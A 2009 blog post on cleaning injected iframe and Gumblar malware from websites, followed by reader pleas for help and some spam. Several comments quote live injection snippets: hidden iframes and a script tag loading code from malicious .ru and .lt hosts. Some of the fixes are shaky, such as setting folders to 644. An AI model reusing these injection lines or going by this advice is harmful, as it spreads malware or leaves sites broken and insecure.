Thursday, May 7, 2009

Remove malware,iframe.inf virus from your website

Hi Developers,
For the past few months you would be plucking your hair for removing some of the malwares from your site. I too suffered a lot with these and now i learnt the lesson from them how to safeguard our website from these hackers.


The iframe virus are redirecting to chinese domain which was severely affected by malwares which will lead to theft of secured datas from your system. If you dint care for these virus then the virus will eat your whole site.

How to Remove Iframe virus?
Iframe tags will be written just below the body tag. Follow the steps to remove virus.
1. Login to your FTP & edit the file which you've got iframe tag.

2. Look for the iframe tag just below the Body or Head tag.

3. Remove the coding & overwrite the file.

4. Now right click the file and click properties/File attributes and make it to "444". So that no hackers have privilege to write the file with iframe code.

5. Once you've cleaned this, the other type of virus will slowly raise, that is it will search the files that are included on the index.php file (ie dbconnect.php, general.php, configure.php, common.php, functions.php, classes.php etc) and it will write a php coding at the top of the page where it will dynamically write the javascript code at the time of execution of the file in the web - browser. The script will redirect the page to gumblar.cn/rss?id=2

6. To remove these type of error carefully look into the above mentioned filename, you can easily find out the php coding at the top of the page. Just remove the coding and make sure it is write protected, so that the php coding wont be written.

7. Still you cant find the solution, just comment to this section. I'll reply ASAP.


Update:
Godaddy hosting had some security issues on the wordpress which they have installed. Please upgrade all your wordpress under the Godaddy hosting (Wordpress older version is having a security hole by which the malicious code will be injected in all the php files. For further information regarding the virus removal, please send a mail to smart2raise@gmail.com

116 comments:

Leela ram said...

After cleaning the virus in my site it comes again after a week or two..

What might be the problem.. i changed all the folder permission to 755

Sathish Kumar said...

set permissions for files only. Set it to 444 not 755

Raza said...

Hi Satish,

I am owning a Windows hosting server and facing same iframe injection and gumblar issue very seriously. I have about 70 websites hosted on web server and this problem is raining on almost daily basis and effecting thousands of files.
Every time i have edit and remove the virus from all files but problem is still there.
My data center guys are also not able to fix this issue properly.
It will be highly appreciatable if you can help me in this issue.

Thanx,
Raza

Taufeeq said...

Mr Satish!
My website www.UFDpoint.com have issue like that. When we open it in google chrome it will give the messange "Malver detected, if you open this site, it will harm ur computer". kindly, tell me solution about this problem.
I hope you can do it .
by
Taufeeq

Sathish Kumar said...

Hi Taufeeq,
If you're sure that ur site is not affected or you've cleaned your site then make a request google webmaster. They will review your site and make it available after their review was completed but it will take atleast 2 days for them

Taufeeq said...

hi Frndz
if you can solve my problem.please, send me email on mailtaufeeq@gmail.com
i will wait your response

celina lucille said...

hi guys

Please can you help my website has been hacked it has some malware virus please email on how I can remove it contactus@sawebs.co.za

Satvinder said...

Hi Satish,

I think iframe issue is getting common with every 3rd website. I also faced the similar issue in most of the websites developed by us. The solution which you have given is appropriate but tell me if it is a dynamic site and I cannot give the permission of 444 as it is a CMS driven website what is the alternative as I keep removing the iframe code but it appears again in few days.
Thanks in advance.
Satty

Sathish Kumar said...

Hi Satvinder,
It will be more easy when you're doing for dynamic site. The major files which will affect is "index.php,dbconnect.php,functions.php, classes.php" and malware will read what are files included in index.php file and will put php scripts in the included files also. So if you put Index.php file as read only (444 permission) and other included files in index.php file will be enough.

Alvin said...

when i set to 444, i received a message Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request...

can anyone explain this

Sathish Kumar said...

Hi Alvin,
Do u set 444 permission only for files or for both files & folders? If u set 444 for files then there will be no issue for 404 error(page not found)

Daniel Kim said...

Thank you Sathish for your post. Its been great help for me to understand what was going on. I had this problem withone of the sites of my company. Is there any solutions for when the website can only function at a set of particular permission settings? Some of the files require to be 755, 644, 707 etc. Any help would be greatly appreciated.

Thanks

KaKaDino said...

My Company websites also have this problem.

Actually, I would like to know where is the virus come from? the web hosting server? The developer's local computer?

Thanks!

Nandla said...

I'm facing same prob and google has email me that the saerch result of my site will include "this site may harm you". i ve applied all the methods but.....
my site is www.pkfunda.com
now what to do????????????plz help

ferdie san luis said...

hi guys, before removing the iframe in your site clean your pc first. scan it with an anti-virus. if its all clean CHANGE YOUR FTP ACCOUNT PASSWORD. This is very important before removing iframe. If you don't clean your pc and change your FTP account password it will keep coming back.

Vizzkid said...

Hi,
I would like to contact you regarding the freelancing of PHP work and other allied work... Kindly send me your contact details...
thx
Vishal Modi.
ProconIT
CHENNAI.

Sathish Kumar said...

Hi Vishal,
My contact details are as follows:
Gmail: smart2raise@gmail.com
Yahoo: smart2raise@yahoo.co.in

Roman said...

I set 444 my index.php file. Few days index.php was running without iframe. But now iframe again inserted in file. What is the compact solution of this problem. Pls write me asap.

Roman

Sathish Kumar said...

Hi Roman,
Have you changed your ftp password after removing the iframe

SaschArt said...

Clean Web Site at http://soft.saschart.com/index.php#Clean%20Web%20Site can help to anybody

Biju Mathew said...

Hi,

My all websites affected with this iframe virus. the followings are the code iframe code.

Site-1

iframe src="http://u1a.ru:8080/index.php" width=109 height=147 style="visibility: hidden"/

site-2

iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi95" width=125 height=125 style="visibility: hidden"/iframe


I really don't know how to remove theis code. I have website which 45000 pages. all files corrupted with this malware.

please help me.

Doc Janov said...

having the same problems as you i found this tool on the web, that seems to be very powerfull in cleaning this sh**
Its able to search and replace text in a whole directory.
So just let it search for the bad code an replace replace it with nothing.
Be sure to change and prptect your System after this.

http://www.inforapid.de/html/suchenersetzen.htm

cryss1988.gmail.com said...

Biju Mathew i`m having the same problem as you do, how can i get rid of that .... ????

tanyasilvano said...

Please help! I do not know that much at all about this virus that has attacked my business web site. I have contacted my host and they are saying that it must be something in my script. I designed my website in Microsoft publisher; and I checked the pages and my computer for viruses but nothing shows. However every time a customer logs in to my website it says are you sure you want to open this site it contains Exploit software that says Exploit:Win32/Pdfjsc.AV and the alert level is severe. Can anyone help me please???? My customers are getting pretty upset and I don't know how to fix it. Thanks

Sathish Kumar said...

Hi tanyasilvano,
If you need to remove virus from your site you can contact me through smart2raise@gmail.com. I assure that next time the virus would not affect your website

Conor Treacy said...

Just so it's clear, this is NOT a VIRUS! This is an exploit of the site, and using Virus Scanners or calling it a Virus is incorrect. These are exploits of files.

Setting to 444 will work, provided your program does not need to write to the file.

tanyasilvano said...

How and what do I set too 444? This was the first website that I designed so I do not know too much. Thanks for your help, I appreciate it.

manohar said...

i removed the iframe in HTML and changed the file permissions to 444 but when i searched the my website in google "This site may harm your computer."it is showing like this.

PLEASE ANY ONE HELP ME ON THIS

Sathish Kumar said...

Hi Manohar,
You need to request a review in google. So that the google will crawl your site to check if the site was not affected by virus & then it will remove the warning message. You need to add your site in google webmaster to verify the site

manohar said...

Hi Satish,

I reviewed the website named as STOPBADWARE.org. But iam not able to submit a review report to that website.

i dont have much knowledge on google webmaster can u give me the URL where can i submit my report.

Panos said...

I have the smae iframer virus and i cannot do anything. Firstly i deleted all ftp files and upload a new. Then i run all major antivirus programs ( Avg, Symantec, Spybot, Ad-Aware ) and not any virus found in my system. I changed all ftp and CP passwords and after 2 days the iframer come up again..i changed again my passwords and today again...

Is there anyone who can help me..I dont know what more to do, my hosting company says there is not any infection on the server..

Sathish Kumar said...

Manohar, Its a little long process in submitting google webmaster. I can able to rectify the virus. Please contact me.

palizaa said...

Hello !!
i have changed the file permission to 444 but it automatically comes to 644 how does it happen.

al already pissed off removing this iframe. plz assist..

Sathish said...

Hi Palizaa,
If you need any further assistance which in my blog doesn't help, feel free to contact my mail-id:smart2raise@gmail.com

sbee said...

Guys change ur ftp password and never access this FTP account with infected mec.. try to use linux or mac for cleaning.

This virus get FTP information from affected windows system.

Anonymous said...

here is my website...
http://www.e2pages.com/en
u knw hoe to fix it?
i try n try in internet but still cant..i hv not ideo at all...
Hope u can help...N thanks you so much..

Sathish Kumar said...

For fixing issue in http://www.e2pages.com/en. Please post ur contact details.

MLM Player said...

Dear Friend,
I have a real estate website. Before some time I was facing some string error, but it was solved as I have make its code to '444'. But now a new problem generates, when I logout from ftp software, my index file's attribute automatically changes from '444' to '644' & it again become affected. Plz guide me.
Thanks a lot
Nikhilesh Singh Naruka

beheader said...

my code won't set on 444, nor 040, but 644 on ftp.What do I do?

Sathish Kumar said...

Hi Beheader,
You need to set 444 for files alone not for folders. For folders you can set to 644.

Website Design said...

Than you for the info. Your suggestion helped me alot.

Sathish said...

You're welcome

bhav said...

Its working gr8 on php files...thanks

but what do we do if our site is in asp.net - windows server - it does not allow to change permissions ???

please advice.

Sathish said...

Hi Bhav,
Thanks for your feedback. If you're using windows server then you need to give file permission from file manager in control panel.

Atul said...

How to check it on windows server where asp.net files are .
As in php , these malwares sometimes create .php file in wriable folders but in windows server what do we check

Also in winhows we cannot give 444 permission

Sathish said...

Hi Atul,
you can give 444 permission in control panel. If you're using Plesk, then you need give write,read permission only to admin & not even for ftp users

Mukesh said...

Hi Satish,
few days ago i changed my file permission and make them in readonly (444), but today i checked that those files are again get the write permission(644) automatically.

do you know why it happens and how to get rid from it?

Sathish said...

hi Mukesh,
Hw did you give the file permission? Through FTP or through Control Panel? If you'd given it through FTP some servers dont accept that.

Mukesh said...

i did it from ftp but that time it shows that file permissions are changed.

Sathish said...

Try it from control panel this time

Jasontor said...

How exactly do I get it off of my computer?

Mukesh said...

You can use Avira Anti virus.

Anonymous said...

Thanx for dis blog ,i not able solve tht problem ,And from dis blog idea i change permission as 444,now i solution for tht particular only for sathish kumar and thnx for all

Nitin Vyas said...

Hi satish
is there a way we can get rid of this iframe thing in joomla without having to touch the databse.

Nitin

Sathish said...

Hi Nitin,
Until the virus not affected the database we can clean joomla sites without affecting it. You need to make sure whether all the images & templates are backed-up

Atul said...

Thanks Satish .
But We have a websites hosted on Windows server which are in ASP.NET .
on regular basis our sites get infected with Malware attacks like IFRAME Malware . Also sometimes these Malwares just eat of the codes on the pages .

I have read about these but they are mostly in Linux server with PHP websites . As I had seen here sometimes they keep php files and htaccess in writable folders also .

Can you advice what and how to clean them on windows server .

Also in Windows you do not have 444 permission. We had only given IUSER Full rights permissions to the folders where we are doing File Uploads from the codes .

php puli said...

My web site is a news portal with joomla.can i make the whole folder write protected?
http://relaxguru.blogspot.com

Sathish said...

Hi PHP Puli,
If you set 444 permission for whole site then nothing will be displayed in the webpage. Go for a try :)

SYED MUHAMMAD FAIZAN said...

hello,

My website is http://www.funxperts.com
I have removed iframes and check it for other malacious codes where I know. but I dont what is the matter of "444"
plz help me
my ID is
faizan_baba007@yahoo.com

Anonymous said...

I am gettin the same problem with Iframe,


When I view source of the page I can see the iframe link


I hve a lot of .php in the ftp space but dont know how to edit them

plz help

mymymy@tesco.net

Naveen Malik said...

I am setting permission to 444 but after completing it is back to 644 why this is happening ???

Sathish said...

Hi Naveen,
Whats your server? Linux or Windows? If Windows means, it wont understand the file permission which you given through ftp. So you need to do it from Control Panel.

Desi Town said...

hi,
i have worldpree blog my blog effect ifram virus when i remove the ifram virus my blog effect javascript virus can you help me for remove virus my blog.
and my all site effect
my site url www.desitown.info

Sathish said...

Hi Desi Town,
Please give your mail-id or you can contact me @ smart2raise@gmail.com. I'll help you

Idris said...

Hi Sathish,

One of my Client site is affected by so many malwares, like Iframe,CRYPT script and eval=base64(),also there was folders called .xdata, .xtop, .xhot containing lot of html files in the public_html directory.

I have removed all script and tags from the files and also the malware folders but still the site is down and shows malware warning in the browser and it still

Even I can't able to login to cpanel account of that website.

Can you please tell me what was the issue and how to find root cause of this malware.

Sathish said...

Hi Idris,
Please send your contact info. I'll help you

Idris said...

Hi,

Here is my email address

noesys.test8@gmail.com

Ady said...

Hi,

I am havng script virus in my website and its still there.
I removed the whole site from server and uploaded the whole site again but its same showing script.

Can anyone help me to sort out this thing.

Ady

Sathish said...

Hi Ady,
I'll help you. Please post your contact info or send mail to smart2raise@gmail.com

prady said...

Hi Satish,

Thanks for your wonderful post. I have this exploit on a blog. Wheni do a view source i can see the javascript added but when i look at the wordpress index page i can find the iframe code.
http://www.ellensuazo.com/ellensuazo/blog/

Not sure how can i find that piece of code. Also running the norton does not detect the exploit Is there anyother AV you would recommend to catch this on my local system.

Thanks
pradkris[at]gmail[dot]com

prady said...

i meant that i cant find the iframe code. Sorry for the typo with reference to my previous post

Md Mostafizur Rahman said...

my site:www.probashibarta.com has been attack malware .i have already cleaned all iframe code amd related file and change all file & folder permission 444 .but its also shown this warning.plz help me............

Sathish said...

Hi Rahman,
Please mail me the details to smart2raise@gmail.com. I'll help you out. Cleaned more than 50 websites & got good results.

ALTAF HUSSAIN said...

i also have same problem dear i have a virus called trenz.pl it shows i frame in end of any page if i opened it or not just tell me the correct wayto remove this cause i have a lot of projects to made in html and php but i couldn't able to make cause virus shown and people doesn't accept it so pleae tell the solution it also shows like this in c windows/system32/drivers/etc/hosts/ when i open it first line is written that

127.0.0.1 trenz.pl/cr something like that and all my file infected with this iframe so tell me till tommorow cause i have to submit my project at saturday please help dear other wise my job problems created.....

Sathish Kumar said...

Hi Altaf,
Please send your details to my mail. I'll help you

Arief said...

I have problem same with Altaf.
My web is aljamaahnet.com
Plz adise me...
Thngks before

Sathish Kumar said...

Hi Arief,
Please brief your details through my mail: smart2raise@gmail.com..i'll assist you

admin said...

hello dear sir,
thanks for your valuable post.
i have a website www.urjaghar.com is giving same type of warning and i am helpless..can you please guide me how to remove warning massage from website, its also appearing in google search results.
thanks
anshuman chandel
info@urjaghar.com

Justyna said...

Sathish,

thanks for your valuable post and finding the time to reply to all these comments, where you give advice as well. Thank you also a lot for your consultation with me through email. You saved me a lot of stress:)

Greetings
Justyna

Shishupal said...

my website address is justtfind.com i found the error only in Google Chrome and in other browsers it is running good so pls help me to solve this error

Sathish said...

Hi Shishupal,
Pls send the details to the above mail id. I'll help you

KEVIN ENTERPRISES PVT. LTD. said...

Hello Mr Satish!
My website www.kevincpp.com have issue like that. When we open it in mozilla firefox or internet explorer it will give the messange " Reported Attcek page, This web page at kevincpp.com has been reported as an attack page and has been blocked based on your security preferences." kindly, tell me solution about this problem.

Sathish said...

Hi Kevin Enterprises,
I saw your site. Please send ur contact information to my e-mail: smart2raise@gmail.com

Eddy said...

Hello Mr Satish,

My website is also showing virus warnings. I have asked my web design company to remove them but it seems like the virus keeps coming back. There are different warning from different computers here are 3 examples of warnings I get.

- The website contains elements from the site reachsaw.ru, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

- Trojan Horse Blocked
JS:Illredir-AQ[Trj]

- JS_KEMPAR.SM

Can you please help me find a solution to these problems.

Sathish said...

Hi Eddy,
Please send me ur details to my mail-id, i'll help you

prady said...

Hi Satish,

I have the site of a client of mine
http://www.ellensuazo.com/blog/
I tried searching for the code in the theme but i am realy not able to find out where the iframe code is.

Could you help me ?

Sathish said...

Hi Prady,
Send me ur contact details to my mail-id

prady said...

Hi Satish,

I sent you an email at smart######@gmail.com. Could you confirm if you received it.

Thanks
Prady

cmcrci said...

hi,

we r maintaining a web server which is a centos machine and this iframe virus is infected yesterday itself there are nearly 20-30 projects which comprises 7k php files.

Is there any code to remove this iframe at a time in all the php files.

previously the code for clenaer or clean.php is not working.

Plz send me the reply ASAP


My clients are very frustrated with this

Sathish said...

Hi CMCRCI,
First of all, please don't believe the automatic virus cleaner script. It is the fastest method but the script will not guarantee that all the virus code has been cleared. I'm doing manual cleaning & i satisfied more than 40 clients. They dont have problem any more. if you're interested send ur contact information to my mail-id: smart2raise@gmail.com

seo tutorial said...

I have a large website. It's not easy to remove virus from individual pages. If there any bulk removal process. the process which you had mentioned is good and working. If you suggest me some good tools. I will be very thankful to you.
seo tutorial

Sathish Kumar said...

@ seo tutorial: There are many tools to remove virus, but its risky to handle the files. The file may get corrupted (incomplete code), malicious code can be in any type some may be eval() function in php & some may be script tags & some may be iframe..so if we do manually at once, it will be better to safeguard our site. I cleaned manually, may be sometimes we would miss some page. But it is very much efficient than the tool

micro said...

Hello,

I am web developer and made many website.but now a i am getting Malware Error for this google blocked my site.can u tell what i can slove this.gumblar.cn/rss?id=2 same this is showing on my website.please tell me solution.


Thanks

Anonymous said...

how do i set my website thing to 444 everyone is saying that is the answer but how do i do that??
my site is www.nwephotography.com
and i have been having some issues with google saying its iframes are the problem!! please help!

Sathish said...

To set 444 permission, go to your FTP Program, login with ftp details & right click on the file & click properties & set 444 permission

Anonymous said...

my blog has been attacked by malware because google chrome keep displaying "malware detected.This site may harm to your computer".
please help me with this.
myy blog url facingdlife.blogspot.com

Sathish said...

Hi,
Is the blogspot is owned by you?. Because only if you paid to google, they will give the blogspot with ftp details.

Anonymous said...

where can i download this virus

dskanth said...

My site got infected with an iframe virus called baaswer.com, that iam not able to find in my code. I think my domain is infected with that virus, so iam not able to track it.

Santosh said...

I hve a site designed in my home and soon i am going to host it ...but when i activate my antivirus my file index.php including many of those type of file are not assesible ...it says Access Denied...yea and that iframe virus ..i try to keep 444 but it cant be edited ...Right now i can see A there..how to edit that..plz help me... i hve to deactivate my antivirus so that to run or edit my site ....i know after hosting it will shows a virus contain site plz help me ....

David Kroodsma said...

Hi - I have an unwanted iframe call in my index.php file (right after the body tag), and I have searched my code, reuploaded, and I still can't find the malicious file. How is this file being rewritten?

Sathish said...

Hi David,
Check for eval code either in php file or javascript file

Ajay Dhar said...

Thanks Sathish Sir, I also found it beneficial

Hotrel said...

I don't even know how to find where the iframe tag is. where do i have to search for it? Please help cause i'm losing all the taffic!

Sathish said...

Hi Hotrel,
Please send your details to smart2raise@gmail.com, i'll assist you.

Fair said...

My website is www.f-h.co, I am having issues with Malware. My index.php files are infected. The error is - Warning: Cannot modify header information - headers already sent by (output started at /home/content/f/a/i/fair5375/html/fairhealth/index.php(1) : eval()'d code:37) in /home/content/f/a/i/fair5375/html/fairhealth/wp-includes/pluggable.php on line 934. I have found the index.php files and I remove the coding but it comes back, I am new to this, and I do not want to lose my content. How can remove the malware?

raj said...

we have a website indianbookshop.co.in Which is developed in .net (.aspx pages). For last few months we are facing malware problem. After ending of our control the "html tag >> then body tag >> then some javascript is inserted in this page ... as per given below.
------------------------


html>body>script type="text/javascript"

src="http://arciaunamu.lt/jstools.js">/script>/body></html

--------------------------

Its showing error & malware problem. We also changed ftp permission to 444, delete & reset all ftp passwords. But still after 13-14 days error again come on website. Its very disappointing, Please suggest something...

Sathish Kumar said...

@Raj,
Kindly send the details to smart2raise@gmail.com

madhu said...

hey am madhu
am fa miler with PHP in English.
but now i want to create my web page difficulty like using mull ti languages if any one can help on this


can u give me replies throw this mail punnamadhu98@yahoo.com

Abhishek Mishra said...

Hi, I am abhishek Mishra
Thanks man your suggestion solve my problem

Twinkle Star said...

hello sir,

i have blog www.http://southindiamovies.blogspot.com, suddenly attacked malware virus. i dont know how to remove this.
kindly assist and guide me to remove that malware.

Please Reply : www.successk19@gmail.com

Sameer Srivastava said...

hello,
i am sameer and i have a website www.chaahatintl.com . i didn;t built it all myself nor i have have any knowledge about it. i wanted to delete every stuffs from my website but the data was not deleting and my has a virus too...
please help
mail me at chaahatint@gmail.com ASAP

Sqiar said...

Thanks a lot for sharing this with all folks you really recognise what you are talking about! In this complex environment business need to present there company data in meaningful way.Sqiar (http://www.sqiar.com/consultancy/tableau/) which is in UK,provide services like Tableau and Data Warehousing etc .In these services sqiar experts convert company data into meaningful way.

Naviya Nair said...

Great Article..
PHP Training in Chennai
Online PHP Training
Online PHP Training India
PHP Training Chennai
PHP Training institute in Chennai

Bhavya Kumar said...

My friend Suggest me this blog and I can say this is the best blog to get the basic knowledge.Thank you so much for this Selenium Training in Chennai

Ramya Krishnan said...

Hello, Thanks for your info, very much informative, i found little difficult to learn, but your article gives some clear picture. Thanks for valuable time.
PHP Training in chennai